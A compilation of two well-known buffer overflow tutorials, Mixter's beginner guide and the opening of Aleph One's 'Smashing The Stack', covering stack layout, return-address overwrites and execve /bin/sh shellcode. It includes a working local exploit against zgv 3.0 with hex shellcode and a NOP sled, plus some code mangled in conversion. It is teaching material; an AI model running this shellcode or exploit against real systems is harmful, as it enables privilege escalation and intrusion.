Writing Buffer and Heap Overflow Exploits
The following articles were was found on the Web, using the Google search engine
with keywords "buffer overflow exploit". They were all posted at
http://www.11a.nu/stack/exploit.txt".
A cleaner version of the first article,
in HTML, was posted at
http://www.securiteam.com/securityreviews/5OP0B006UQ.html.
Writing buffer overflow exploits - a tutorial for beginners
===========================================================
Security papers - members.tripod.com/mixtersecurity/papers.html
Buffer overflows in user input dependent buffers have become one of
the biggest security hazards on the internet and to modern computing
in general. This is because such an error can easily be made at
programming level, and while invisible for the user who does not
understand or cannot acquire the source code, many of those errors are
easy to exploit. This paper makes an attempt to teach the novice -
average C programmer how an overflow condition can be proven to be
exploitable.
Mixter
_______________________________________________________________________________
1. Memory
Note: The way I describe it here, memory for a process is organized on most
computers, however it depends on the type of processor architecture.
This example is for x86 and also roughly applies to sparc.
The principle of exploiting a buffer overflow is to overwrite parts of
memory which aren't supposed to be overwritten by arbitrary input and
making the process execute this code. To see how and where an overflow
takes place, lets take a look at how memory is organized. A page is a
part of memory that uses its own relative addressing, meaning the
kernel allocates initial memory for the process, which it can then
access without having to know where the memory is physically located
in RAM. The processes memory consists of three sections:
- code segment, data in this segment are assembler instructions that
the processor executes. The code execution is non-linear, it can skip
code, jump, and call functions on certain conditions. Therefore, we
have a pointer called EIP, or instruction pointer. The address where
EIP points to always contains the code that will be executed next.
- data segment, space for variables and dynamic buffers
- stack segment, which is used to pass data (arguments) to functions
and as a space for variables of functions. The bottom (start) of the
stack usually resides at the very end of the virtual memory of a page,
and grows down. The assembler command PUSHL will add to the top of the
stack, and POPL will remove one item from the top of the stack and put
it in a register. For accessing the stack memory directly, there is
the stack pointer ESP that points at the top (lowest memory address)
of the stack.
_______________________________________________________________________________
2. Functions
A function is a piece of code in the code segment, that is called,
performs a task, and then returns to the previous thread of execution.
Optionally, arguments can be passed to a function. In assembler, it
usually looks like this (very simple example, just to get the idea):
memory address code
0x8054321 pushl $0x0
0x8054322 call $0x80543a0
0x8054327 ret
0x8054328 leave
...
0x80543a0 popl %eax
0x80543a1 addl $0x1337,%eax
0x80543a4 ret
What happens here? The main function calls function(0); The variable
is 0, main pushes it onto the stack, and calls the function. The
function gets the variable from the stack using popl. After
finishing, it returns to 0x8054327. Commonly, the main function would
always push register EBP on the stack, which the function stores, and
restores after finishing. This is the frame pointer concept, that
allows the function to use own offsets for addressing, which is mostly
uninteresting while dealing with exploits, because the function will
not return to the original execution thread anyways. :-) We just have
to know what the stack looks like. At the top, we have the internal
buffers and variables of the function. After this, there is the saved
EBP register (32 bit, which is 4 bytes), and then the return address,
which is again 4 bytes. Further down, there are the arguments passed
to the function, which are uninteresting to us. In this case, our
return address is 0x8054327. It is automatically stored on the stack
when the function is called. This return address can be overwritten,
and changed to point to any point in memory, if there is an overflow
somewhere in the code.
_______________________________________________________________________________
3. Example of an exploitable program
Lets assume that we exploit a function like this:
void lame (void) { char small[30]; gets (small); printf("%s\n", small); }
main() { lame (); return 0; }
Compile and disassemble it:
# cc -ggdb blah.c -o blah
/tmp/cca017401.o: In function `lame':
/root/blah.c:1: the `gets' function is dangerous and should not be used.
# gdb blah
/* short explanation: gdb, the GNU debugger is used here to read the
binary file and disassemble it (translate bytes to assembler code) */
(gdb) disas main
Dump of assembler code for function main:
0x80484c8 : pushl %ebp
0x80484c9 : movl %esp,%ebp
0x80484cb : call 0x80484a0
0x80484d0 : leave
0x80484d1 : ret
(gdb) disas lame
Dump of assembler code for function lame:
/* saving the frame pointer onto the stack right before the ret address */
0x80484a0 : pushl %ebp
0x80484a1 : movl %esp,%ebp
/* enlarge the stack by 0x20 or 32. our buffer is 30 characters, but the
memory is allocated 4byte-wise (because the processor uses 32bit words)
this is the equivalent to: char small[30]; */
0x80484a3 : subl $0x20,%esp
/* load a pointer to small[30] (the space on the stack, which is located
at virtual address 0xffffffe0(%ebp)) on the stack, and call
the gets function: gets(small); */
0x80484a6 : leal 0xffffffe0(%ebp),%eax
0x80484a9 : pushl %eax
0x80484aa : call 0x80483ec
0x80484af : addl $0x4,%esp
/* load the address of small and the address of "%s\n" string on stack
and call the print function: printf("%s\n", small); */
0x80484b2 : leal 0xffffffe0(%ebp),%eax
0x80484b5 : pushl %eax
0x80484b6 : pushl $0x804852c
0x80484bb : call 0x80483dc
0x80484c0 : addl $0x8,%esp
/* get the return address, 0x80484d0, from stack and return to that address.
you don't see that explicitly here because it is done by the CPU as 'ret' */
0x80484c3 : leave
0x80484c4 : ret
End of assembler dump.
3a. Overflowing the program
# ./blah
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx <- user input
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
# ./blah
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx <- user input
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Segmentation fault (core dumped)
# gdb blah core
(gdb) info registers
eax: 0x24 36
ecx: 0x804852f 134513967
edx: 0x1 1
ebx: 0x11a3c8 1156040
esp: 0xbffffdb8 -1073742408
ebp: 0x787878 7895160
^^^^^^
EBP is 0x787878, this means that we have written more data on the
stack than the input buffer could handle. 0x78 is the hex
representation of 'x'. The process had a buffer of 32 bytes maximum
size. We have written more data into memory than allocated for user
input and therefore overwritten EBP and the return address with
'xxxx', and the process tried to resume execution at address 0x787878,
which caused it to get a segmentation fault.
3b. Changing the return address
Lets try to exploit the program to return to lame() instead of return.
We have to change return address 0x80484d0 to 0x80484cb, that is all.
In memory, we have: 32 bytes buffer space | 4 bytes saved EBP | 4
bytes RET Here is a simple program to put the 4byte return address
into a 1byte character buffer:
main()
{
int i=0; char buf[44];
for (i=0;i<=40;i+=4)
*(long *) &buf[i] = 0x80484cb;
puts(buf);
}
# ret
ËËËËËËËËËËË,
# (ret;cat)|./blah
test <- user input
ËËËËËËËËËËË,test
test <- user input
test
Here we are, the program went through the function two times.
If an overflow is present, the return address of functions can be
changed to alter the programs execution thread.
_______________________________________________________________________________
4. Shellcode
To keep it simple, shellcode is simply assembler commands, which we
write on the stack and then change the retun address to return to the
stack. Using this method, we can insert code into a vulnerable process
and then execute it right on the stack. So, lets generate insertable
assembler code to run a shell. A common system call is execve(), which
loads and runs any binary, terminating execution of the current
process. The manpage gives us the usage:
int execve (const char *filename, char *const argv [], char *const envp[]);
Lets get the details of the system call from glibc2:
# gdb /lib/libc.so.6
(gdb) disas execve
Dump of assembler code for function execve:
0x5da00 : pushl %ebx
/* this is the actual syscall. before a program would call execve, it would
push the arguments in reverse order on the stack: **envp, **argv, *filename */
/* put address of **envp into edx register */
0x5da01 : movl 0x10(%esp,1),%edx
/* put address of **argv into ecx register */
0x5da05 : movl 0xc(%esp,1),%ecx
/* put address of *filename into ebx register */
0x5da09 : movl 0x8(%esp,1),%ebx
/* put 0xb in eax register; 0xb == execve in the internal system call table */
0x5da0d : movl $0xb,%eax
/* give control to kernel, to execute execve instruction */
0x5da12 : int $0x80
0x5da14 : popl %ebx
0x5da15 : cmpl $0xfffff001,%eax
0x5da1a : jae 0x5da1d <__syscall_error>
0x5da1c : ret
End of assembler dump.
4a. making the code portable
We have to apply a trick to be able to make shellcode without having
to reference the arguments in memory the conventional way, by giving
their exact address on the memory page, which can only be done at
compile time. Once we can estimate the size of the shellcode, we can
use the instructions jmp and call to go a specified
number of bytes back or forth in the execution thread. Why use a call?
We have the opportunity that a CALL will automatically store the
return address on the stack, the return address being the next 4 bytes
after the CALL instruction. By placing a variable right behind the
call, we indirectly push its address on the stack without having to
know it.
0 jmp (skip Z bytes forward)
2 popl %esi
... put function(s) here ...
Z call <-Z+2> (skip 2 less than Z bytes backward, to POPL)
Z+5 .string (first variable)
(Note: If you're going to write code more complex than for spawning a
simple shell, you can put more than one .string behind the code. You
know the size of those strings and can therefore calculate their
relative locations once you know where the first string is located.)
4b. the shellcode
global code_start /* we'll need this later, dont mind it */
global code_end
.data
code_start:
jmp 0x17
popl %esi
movl %esi,0x8(%esi) /* put address of **argv behind shellcode,
0x8 bytes behind it so a /bin/sh has place */
xorl %eax,%eax /* put 0 in %eax */
movb %eax,0x7(%esi) /* put terminating 0 after /bin/sh string */
movl %eax,0xc(%esi) /* another 0 to get the size of a long word */
my_execve:
movb $0xb,%al /* execve( */
movl %esi,%ebx /* "/bin/sh", */
leal 0x8(%esi),%ecx /* & of "/bin/sh", */
xorl %edx,%edx /* NULL */
int $0x80 /* ); */
call -0x1c
.string "/bin/shX" /* X is overwritten by movb %eax,0x7(%esi) */
code_end:
(The relative offsets 0x17 and -0x1c can be gained by putting in 0x0,
compiling, disassembling and then looking at the shell codes size.)
This is already working shellcode, though very minimal. You should at
least disassemble the exit() syscall and attach it (before the
'call'). The real art of making shellcode also consists of avoiding
any binary zeroes in the code (indicates end of input/buffer very
often) and modify it for example, so the binary code does not contain
control or lower characters, which would get filtered out by some
vulnerable programs. Most of this stuff is done by self-modifying
code, like we had in the movb %eax,0x7(%esi) instruction. We replaced
the X with \0, but without having a \0 in the shellcode initially...
Lets test this code... save the above code as code.S (remove comments)
and the following file as code.c:
extern void code_start();
extern void code_end();
#include
main() { ((void (*)(void)) code_start)(); }
# cc -o code code.S code.c
# ./code
bash#
You can now convert the shellcode to a hex char buffer. Best way to
do this is, print it out:
#include
extern void code_start(); extern void code_end();
main() { fprintf(stderr,"%s",code_start); }
and parse it through aconv -h or bin2c.pl, those tools can be found at:
http://www.dec.net/~dhg or http://members.tripod.com/mixtersecurity
_______________________________________________________________________________
5. Writing an exploit
Let us take a look at how to change the return address to point to
shellcode put on the stack, and write a sample exploit. We will take
zgv, because that is one of the easiest things to exploit out there :)
# export HOME=`perl -e 'printf "a" x 2000'`
# zgv
Segmentation fault (core dumped)
# gdb /usr/bin/zgv core
#0 0x61616161 in ?? ()
(gdb) info register esp
esp: 0xbffff574 -1073744524
Well, this is the top of the stack at crash time. It is safe to
presume that we can use this as return address to our shellcode.
We will now add some NOP (no operation) instructions before our
buffer, so we don't have to be 100% correct regarding the prediction
of the exact start of our shellcode in memory (or even brute forcing
it). The function will return onto the stack somewhere before our
shellcode, work its way through the NOPs to the inital JMP command,
jump to the CALL, jump back to the popl, and run our code on the
stack.
Remember, the stack looks like this: at the lowest memory address, the
top of the stack where ESP points to, the initial variables are
stored, namely the buffer in zgv that stores the HOME environment
variable. After that, we have the saved EBP(4bytes) and the return
address of the previous function. We must write 8 bytes or more behind
the buffer to overwrite the return address with our new address on the
stack.
The buffer in zgv is 1024 bytes big. You can find that out by glancing
at the code, or by searching for the initial subl $0x400,%esp (=1024)
in the vulnerable function. We will now put all those parts together
in the exploit:
5a. Sample zgv exploit
/* zgv v3.0 exploit by Mixter
buffer overflow tutorial - http://1337.tsx.org
sample exploit, works for example with precompiled
redhat 5.x/suse 5.x/redhat 6.x/slackware 3.x linux binaries */
#include
#include
#include
/* This is the minimal shellcode from the tutorial */
static char shellcode[]=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
#define NOP 0x90
#define LEN 1032
#define RET 0xbffff574
int main()
{
char buffer[LEN];
long retaddr = RET;
int i;
fprintf(stderr,"using address 0x%lx\n",retaddr);
/* this fills the whole buffer with the return address, see 3b) */
for (i=0;i function() -> strcpy(smallbuffer,getenv("HOME"));
At this point, zgv fails to do bounds checking, writes beyond
smallbuffer, and the return address to main is overwritten with the
return address on the stack. function() does leave/ret and the EIP
points onto the stack:
0xbffff574 nop
0xbffff575 nop
0xbffff576 nop
0xbffff577 jmp $0x24 1
0xbffff579 popl %esi 3 <--\ |
[... shellcode starts here ...] | |
0xbffff59b call -$0x1c 2 <--/
0xbffff59e .string "/bin/shX"
Lets test the exploit...
# cc -o zgx zgx.c
# ./zgx
using address 0xbffff574
bash#
5b. further tips on writing exploits
There are a lot of programs which are tough to exploit, but
nonetheless vulnerable. However, there are a lot of tricks you can do
to get behind filtering and such. There are also other overflow
techniques which do not necessarily include changing the return
address at all or only the return address. There are so-called pointer
overflows, where a pointer that a function allocates can be
overwritten by an overflow, altering the programs execution flow (an
example is the RoTShB bind 4.9 exploit), and exploits where the return
address points to the shells environment pointer, where the shellcode
is located instead of being on the stack (this defeats very small
buffers, and Non-executable stack patches, and can fool some security
programs, though it can only be performed locally). Another important
subject for the skilled shellcode author is radically self-modifying
code, which initially only consists of printable, non-white upper case
characters, and then modifies itself to put functional shellcode on
the stack which it executes, etc. You should never, ever have any
binary zeroes in your shell code, because it will most possibly not
work if it contains any. But discussing how to sublimate certain
assembler commands with others would go beyond the scope of this
paper. I also suggest reading the other great overflow howto's out
there, written by aleph1, Taeoh Oh and mudge.
5c. important note
You will NOT be able to use this tutorial on Windows or Macintosh. Do
NOT ask me for cc.exe and gdb.exe either! =oP
_______________________________________________________________________________
6. Conclusions
We have learned, that once an overflow is present which is user
dependent, it can be exploited about 90% of the time, even though
exploiting some situations is difficult and takes some skill. Why is
it important to write exploits? Because ignorance is omniscient in the
software industry. There have already been reports of vulnerabilities
due to buffer overflows in software, though the software has not been
updated, or the majority of users didn't update, because the
vulnerability was hard to exploit and nobody believed it created a
security risk. Then, an exploit actually comes out, proves and
practically enables a program to be exploitable, and there is usually
a big (neccessary) hurry to update it.
As for the programmer (you), it is a hard task to write secure
programs, but it should be taken very serious. This is a specially
large concern when writing servers, any type of security programs, or
programs that are suid root, or designed to be run by root, any
special accounts, or the system itself. Apply bounds checking (strn*,
sn*, functions instead of sprintf etc.), prefer allocating buffers of
a dynamic, input-dependent, size, be careful on for/while/etc. loops
that gather data and stuff it into a buffer, and generally handle user
input with very much care are the main principles I suggest.
There has also been made notable effort of the security industry to
prevent overflow problems with techniques like non-executable stack,
suid wrappers, guard programs that check return addresses, bounds
checking compilers, and so on. You should make use of those techniques
where possible, but do not fully rely on them. Do not assume to be
safe at all if you run a vanilla two-year old UNIX distribution
without updates, but overflow protection or (even more stupid)
firewalling/IDS. It cannot assure security, if you continue to use
insecure programs because _all_ security programs are _software_ and
can contain vulnerabilities themselves, or at least not be perfect. If
you apply frequent updates _and_ security measures, you can still not
expect to be secure, _but_ you can hope. :-)
Mixter
http://members.tripod.com/mixtersecurity
.oO Phrack 49 Oo.
Volume Seven, Issue Forty-Nine
File 14 of 16
BugTraq, r00t, and Underground.Org
bring you
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Smashing The Stack For Fun And Profit
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
by Aleph One
aleph1@underground.org
`smash the stack` [C programming] n. On many C implementations
it is possible to corrupt the execution stack by writing past
the end of an array declared auto in a routine. Code that does
this is said to smash the stack, and can cause return from the
routine to jump to a random address. This can produce some of
the most insidious data-dependent bugs known to mankind.
Variants include trash the stack, scribble the stack, mangle
the stack; the term mung the stack is not used, as this is
never done intentionally. See spam; see also alias bug,
fandango on core, memory leak, precedence lossage, overrun screw.
Introduction
~~~~~~~~~~~~
Over the last few months there has been a large increase of buffer
overflow vulnerabilities being both discovered and exploited. Examples
of these are syslog, splitvt, sendmail 8.7.5, Linux/FreeBSD mount, Xt
library, at, etc. This paper attempts to explain what buffer overflows
are, and how their exploits work.
Basic knowledge of assembly is required. An understanding of virtual
memory concepts, and experience with gdb are very helpful but not necessary.
We also assume we are working with an Intel x86 CPU, and that the operating
system is Linux.
Some basic definitions before we begin: A buffer is simply a contiguous
block of computer memory that holds multiple instances of the same data
type. C programmers normally associate with the word buffer arrays. Most
commonly, character arrays. Arrays, like all variables in C, can be
declared either static or dynamic. Static variables are allocated at load
time on the data segment. Dynamic variables are allocated at run time on
the stack. To overflow is to flow, or fill over the top, brims, or bounds.
We will concern ourselves only with the overflow of dynamic buffers, otherwise
known as stack-based buffer overflows.
Process Memory Organization
~~~~~~~~~~~~~~~~~~~~~~~~~~~
To understand what stack buffers are we must first understand how a
process is organized in memory. Processes are divided into three regions:
Text, Data, and Stack. We will concentrate on the stack region, but first
a small overview of the other regions is in order.
The text region is fixed by the program and includes code (instructions)
and read-only data. This region corresponds to the text section of the
executable file. This region is normally marked read-only and any attempt to
write to it will result in a segmentation violation.
The data region contains initialized and uninitialized data. Static
variables are stored in this region. The data region corresponds to the
data-bss sections of the executable file. Its size can be changed with the
brk(2) system call. If the expansion of the bss data or the user stack
exhausts available memory, the process is blocked and is rescheduled to
run again with a larger memory space. New memory is added between the data
and stack segments.
/------------------\ lower
| | memory
| Text | addresses
| |
|------------------|
| (Initialized) |
| Data |
| (Uninitialized) |
|------------------|
| |
| Stack | higher
| | memory
\------------------/ addresses
Fig. 1 Process Memory Regions
What Is A Stack?
~~~~~~~~~~~~~~~~
A stack is an abstract data type frequently used in computer science. A
stack of objects has the property that the last object placed on the stack
will be the first object removed. This property is commonly referred to as
last in, first out queue, or a LIFO.
Several operations are defined on stacks. Two of the most important are
PUSH and POP. PUSH adds an element at the top of the stack. POP, in
contrast, reduces the stack size by one by removing the last element at the
top of the stack.
Why Do We Use A Stack?
~~~~~~~~~~~~~~~~~~~~~~
Modern computers are designed with the need of high-level languages in
mind. The most important technique for structuring programs introduced by
high-level languages is the procedure or function. From one point of view, a
procedure call alters the flow of control just as a jump does, but unlike a
jump, when finished performing its task, a function returns control to the
statement or instruction following the call. This high-level abstraction
is implemented with the help of the stack.
The stack is also used to dynamically allocate the local variables used in
functions, to pass parameters to the functions, and to return values from the
function.
The Stack Region
~~~~~~~~~~~~~~~~
A stack is a contiguous block of memory containing data. A register called
the stack pointer (SP) points to the top of the stack. The bottom of the
stack is at a fixed address. Its size is dynamically adjusted by the kernel
at run time. The CPU implements instructions to PUSH onto and POP off of the
stack.
The stack consists of logical stack frames that are pushed when calling a
function and popped when returning. A stack frame contains the parameters to
a function, its local variables, and the data necessary to recover the
previous stack frame, including the value of the instruction pointer at the
time of the function call.
Depending on the implementation the stack will either grow down (towards
lower memory addresses), or up. In our examples we'll use a stack that grows
down. This is the way the stack grows on many computers including the Intel,
Motorola, SPARC and MIPS processors. The stack pointer (SP) is also
implementation dependent. It may point to the last address on the stack, or
to the next free available address after the stack. For our discussion we'll
assume it points to the last address on the stack.
In addition to the stack pointer, which points to the top of the stack
(lowest numerical address), it is often convenient to have a frame pointer
(FP) which points to a fixed location within a frame. Some texts also refer
to it as a local base pointer (LB). In principle, local variables could be
referenced by giving their offsets from SP. However, as words are pushed onto
the stack and popped from the stack, these offsets change. Although in some
cases the compiler can keep track of the number of words on the stack and
thus correct the offsets, in some cases it cannot, and in all cases
considerable administration is required. Futhermore, on some machines, such
as Intel-based processors, accessing a variable at a known distance from SP
requires multiple instructions.
Consequently, many compilers use a second register, FP, for referencing
both local variables and parameters because their distances from FP do
not change with PUSHes and POPs. On Intel CPUs, BP (EBP) is used for this
purpose. On the Motorola CPUs, any address register except A7 (the stack
pointer) will do. Because the way our stack grows, actual parameters have
positive offsets and local variables have negative offsets from FP.
The first thing a procedure must do when called is save the previous FP
(so it can be restored at procedure exit). Then it copies SP into FP to
create the new FP, and advances SP to reserve space for the local variables.
This code is called the procedure prolog. Upon procedure exit, the stack
must be cleaned up again, something called the procedure epilog. The Intel
ENTER and LEAVE instructions and the Motorola LINK and UNLINK instructions,
have been provided to do most of the procedure prolog and epilog work
efficiently.
Let us see what the stack looks like in a simple example:
example1.c:
------------------------------------------------------------------------------
void function(int a, int b, int c) {
char buffer1[5];
char buffer2[10];
}
void main() {
function(1,2,3);
}
------------------------------------------------------------------------------
To understand what the program does to call function() we compile it with
gcc using the -S switch to generate assembly code output:
$ gcc -S -o example1.s example1.c
By looking at the assembly language output we see that the call to
function() is translated to:
pushl $3
pushl $2
pushl $1
call function
This pushes the 3 arguments to function backwards into the stack, and
calls function(). The instruction 'call' will push the instruction pointer
(IP) onto the stack. We'll call the saved IP the return address (RET). The
first thing done in function is the procedure prolog:
pushl %ebp
movl %esp,%ebp
subl $20,%esp
This pushes EBP, the frame pointer, onto the stack. It then copies the
current SP onto EBP, making it the new FP pointer. We'll call the saved FP
pointer SFP. It then allocates space for the local variables by subtracting
their size from SP.
We must remember that memory can only be addressed in multiples of the
word size. A word in our case is 4 bytes, or 32 bits. So our 5 byte buffer
is really going to take 8 bytes (2 words) of memory, and our 10 byte buffer
is going to take 12 bytes (3 words) of memory. That is why SP is being
subtracted by 20. With that in mind our stack looks like this when
function() is called (each space represents a byte):
bottom of top of
memory memory
buffer2 buffer1 sfp ret a b c
<------ [ ][ ][ ][ ][ ][ ][ ]
top of bottom of
stack stack
Buffer Overflows
~~~~~~~~~~~~~~~~
A buffer overflow is the result of stuffing more data into a buffer than
it can handle. How can this often found programming error can be taken
advantage to execute arbitrary code? Lets look at another example:
example2.c
------------------------------------------------------------------------------
void function(char *str) {
char buffer[16];
strcpy(buffer,str);
}
void main() {
char large_string[256];
int i;
for( i = 0; i < 255; i++)
large_string[i] = 'A';
function(large_string);
}
------------------------------------------------------------------------------
This is program has a function with a typical buffer overflow coding
error. The function copies a supplied string without bounds checking by
using strcpy() instead of strncpy(). If you run this program you will get a
segmentation violation. Lets see what its stack looks when we call function:
bottom of top of
memory memory
buffer sfp ret *str
<------ [ ][ ][ ][ ]
top of bottom of
stack stack
What is going on here? Why do we get a segmentation violation? Simple.
strcpy() is coping the contents of *str (larger_string[]) into buffer[]
until a null character is found on the string. As we can see buffer[] is
much smaller than *str. buffer[] is 16 bytes long, and we are trying to stuff
it with 256 bytes. This means that all 250 bytes after buffer in the stack
are being overwritten. This includes the SFP, RET, and even *str! We had
filled large_string with the character 'A'. It's hex character value
is 0x41. That means that the return address is now 0x41414141. This is
outside of the process address space. That is why when the function returns
and tries to read the next instruction from that address you get a
segmentation violation.
So a buffer overflow allows us to change the return address of a function.
In this way we can change the flow of execution of the program. Lets go back
to our first example and recall what the stack looked like:
bottom of top of
memory memory
buffer2 buffer1 sfp ret a b c
<------ [ ][ ][ ][ ][ ][ ][ ]
top of bottom of
stack stack
Lets try to modify our first example so that it overwrites the return
address, and demonstrate how we can make it execute arbitrary code. Just
before buffer1[] on the stack is SFP, and before it, the return address.
That is 4 bytes pass the end of buffer1[]. But remember that buffer1[] is
really 2 word so its 8 bytes long. So the return address is 12 bytes from
the start of buffer1[]. We'll modify the return value in such a way that the
assignment statement 'x = 1;' after the function call will be jumped. To do
so we add 8 bytes to the return address. Our code is now:
example3.c:
------------------------------------------------------------------------------
void function(int a, int b, int c) {
char buffer1[5];
char buffer2[10];
int *ret;
ret = buffer1 + 12;
(*ret) += 8;
}
void main() {
int x;
x = 0;
function(1,2,3);
x = 1;
printf("%d\n",x);
}
------------------------------------------------------------------------------
What we have done is add 12 to buffer1[]'s address. This new address is
where the return address is stored. We want to skip pass the assignment to
the printf call. How did we know to add 8 to the return address? We used a
test value first (for example 1), compiled the program, and then started gdb:
------------------------------------------------------------------------------
[aleph1]$ gdb example3
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(no debugging symbols found)...
(gdb) disassemble main
Dump of assembler code for function main:
0x8000490 : pushl %ebp
0x8000491 : movl %esp,%ebp
0x8000493 : subl $0x4,%esp
0x8000496 : movl $0x0,0xfffffffc(%ebp)
0x800049d : pushl $0x3
0x800049f : pushl $0x2
0x80004a1 : pushl $0x1
0x80004a3 : call 0x8000470
0x80004a8 : addl $0xc,%esp
0x80004ab : movl $0x1,0xfffffffc(%ebp)
0x80004b2 : movl 0xfffffffc(%ebp),%eax
0x80004b5 : pushl %eax
0x80004b6 : pushl $0x80004f8
0x80004bb : call 0x8000378
0x80004c0 : addl $0x8,%esp
0x80004c3 : movl %ebp,%esp
0x80004c5 : popl %ebp
0x80004c6 : ret
0x80004c7 : nop
------------------------------------------------------------------------------
We can see that when calling function() the RET will be 0x8004a8, and we
want to jump past the assignment at 0x80004ab. The next instruction we want
to execute is the at 0x8004b2. A little math tells us the distance is 8
bytes.
Shell Code
~~~~~~~~~~
So now that we know that we can modify the return address and the flow of
execution, what program do we want to execute? In most cases we'll simply
want the program to spawn a shell. From the shell we can then issue other
commands as we wish. But what if there is no such code in the program we
are trying to exploit? How can we place arbitrary instruction into its
address space? The answer is to place the code with are trying to execute in
the buffer we are overflowing, and overwrite the return address so it points
back into the buffer. Assuming the stack starts at address 0xFF, and that S
stands for the code we want to execute the stack would then look like this:
bottom of DDDDDDDDEEEEEEEEEEEE EEEE FFFF FFFF FFFF FFFF top of
memory 89ABCDEF0123456789AB CDEF 0123 4567 89AB CDEF memory
buffer sfp ret a b c
<------ [SSSSSSSSSSSSSSSSSSSS][SSSS][0xD8][0x01][0x02][0x03]
^ |
|____________________________|
top of bottom of
stack stack
The code to spawn a shell in C looks like:
shellcode.c
-----------------------------------------------------------------------------
#include
void main() {
char *name[2];
name[0] = "/bin/sh";
name[1] = NULL;
execve(name[0], name, NULL);
}
------------------------------------------------------------------------------
To find out what does it looks like in assembly we compile it, and start
up gdb. Remember to use the -static flag. Otherwise the actual code the
for the execve system call will not be included. Instead there will be a
reference to dynamic C library that would normally would be linked in at
load time.
------------------------------------------------------------------------------
[aleph1]$ gcc -o shellcode -ggdb -static shellcode.c
[aleph1]$ gdb shellcode
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(gdb) disassemble main
Dump of assembler code for function main:
0x8000130 : pushl %ebp
0x8000131 : movl %esp,%ebp
0x8000133 : subl $0x8,%esp
0x8000136 : movl $0x80027b8,0xfffffff8(%ebp)
0x800013d : movl $0x0,0xfffffffc(%ebp)
0x8000144 : pushl $0x0
0x8000146 : leal 0xfffffff8(%ebp),%eax
0x8000149 : pushl %eax
0x800014a : movl 0xfffffff8(%ebp),%eax
0x800014d : pushl %eax
0x800014e : call 0x80002bc <__execve>
0x8000153 : addl $0xc,%esp
0x8000156 : movl %ebp,%esp
0x8000158 : popl %ebp
0x8000159 : ret
End of assembler dump.
(gdb) disassemble __execve
Dump of assembler code for function __execve:
0x80002bc <__execve>: pushl %ebp
0x80002bd <__execve+1>: movl %esp,%ebp
0x80002bf <__execve+3>: pushl %ebx
0x80002c0 <__execve+4>: movl $0xb,%eax
0x80002c5 <__execve+9>: movl 0x8(%ebp),%ebx
0x80002c8 <__execve+12>: movl 0xc(%ebp),%ecx
0x80002cb <__execve+15>: movl 0x10(%ebp),%edx
0x80002ce <__execve+18>: int $0x80
0x80002d0 <__execve+20>: movl %eax,%edx
0x80002d2 <__execve+22>: testl %edx,%edx
0x80002d4 <__execve+24>: jnl 0x80002e6 <__execve+42>
0x80002d6 <__execve+26>: negl %edx
0x80002d8 <__execve+28>: pushl %edx
0x80002d9 <__execve+29>: call 0x8001a34 <__normal_errno_location>
0x80002de <__execve+34>: popl %edx
0x80002df <__execve+35>: movl %edx,(%eax)
0x80002e1 <__execve+37>: movl $0xffffffff,%eax
0x80002e6 <__execve+42>: popl %ebx
0x80002e7 <__execve+43>: movl %ebp,%esp
0x80002e9 <__execve+45>: popl %ebp
0x80002ea <__execve+46>: ret
0x80002eb <__execve+47>: nop
End of assembler dump.
------------------------------------------------------------------------------
Lets try to understand what is going on here. We'll start by studying main:
------------------------------------------------------------------------------
0x8000130 : pushl %ebp
0x8000131 : movl %esp,%ebp
0x8000133 : subl $0x8,%esp
This is the procedure prelude. It first saves the old frame pointer,
makes the current stack pointer the new frame pointer, and leaves
space for the local variables. In this case its:
char *name[2];
or 2 pointers to a char. Pointers are a word long, so it leaves
space for two words (8 bytes).
0x8000136 : movl $0x80027b8,0xfffffff8(%ebp)
We copy the value 0x80027b8 (the address of the string "/bin/sh")
into the first pointer of name[]. This is equivalent to:
name[0] = "/bin/sh";
0x800013d : movl $0x0,0xfffffffc(%ebp)
We copy the value 0x0 (NULL) into the seconds pointer of name[].
This is equivalent to:
name[1] = NULL;
The actual call to execve() starts here.
0x8000144 : pushl $0x0
We push the arguments to execve() in reverse order onto the stack.
We start with NULL.
0x8000146 : leal 0xfffffff8(%ebp),%eax
We load the address of name[] into the EAX register.
0x8000149 : pushl %eax
We push the address of name[] onto the stack.
0x800014a : movl 0xfffffff8(%ebp),%eax
We load the address of the string "/bin/sh" into the EAX register.
0x800014d : pushl %eax
We push the address of the string "/bin/sh" onto the stack.
0x800014e : call 0x80002bc <__execve>
Call the library procedure execve(). The call instruction pushes the
IP onto the stack.
------------------------------------------------------------------------------
Now execve(). Keep in mind we are using a Intel based Linux system. The
syscall details will change from OS to OS, and from CPU to CPU. Some will
pass the arguments on the stack, others on the registers. Some use a software
interrupt to jump to kernel mode, others use a far call. Linux passes its
arguments to the system call on the registers, and uses a software interrupt
to jump into kernel mode.
------------------------------------------------------------------------------
0x80002bc <__execve>: pushl %ebp
0x80002bd <__execve+1>: movl %esp,%ebp
0x80002bf <__execve+3>: pushl %ebx
The procedure prelude.
0x80002c0 <__execve+4>: movl $0xb,%eax
Copy 0xb (11 decimal) onto the stack. This is the index into the
syscall table. 11 is execve.
0x80002c5 <__execve+9>: movl 0x8(%ebp),%ebx
Copy the address of "/bin/sh" into EBX.
0x80002c8 <__execve+12>: movl 0xc(%ebp),%ecx
Copy the address of name[] into ECX.
0x80002cb <__execve+15>: movl 0x10(%ebp),%edx
Copy the address of the null pointer into %edx.
0x80002ce <__execve+18>: int $0x80
Change into kernel mode.
------------------------------------------------------------------------------
So as we can see there is not much to the execve() system call. All we need
to do is:
a) Have the null terminated string "/bin/sh" somewhere in memory.
b) Have the address of the string "/bin/sh" somewhere in memory
followed by a null long word.
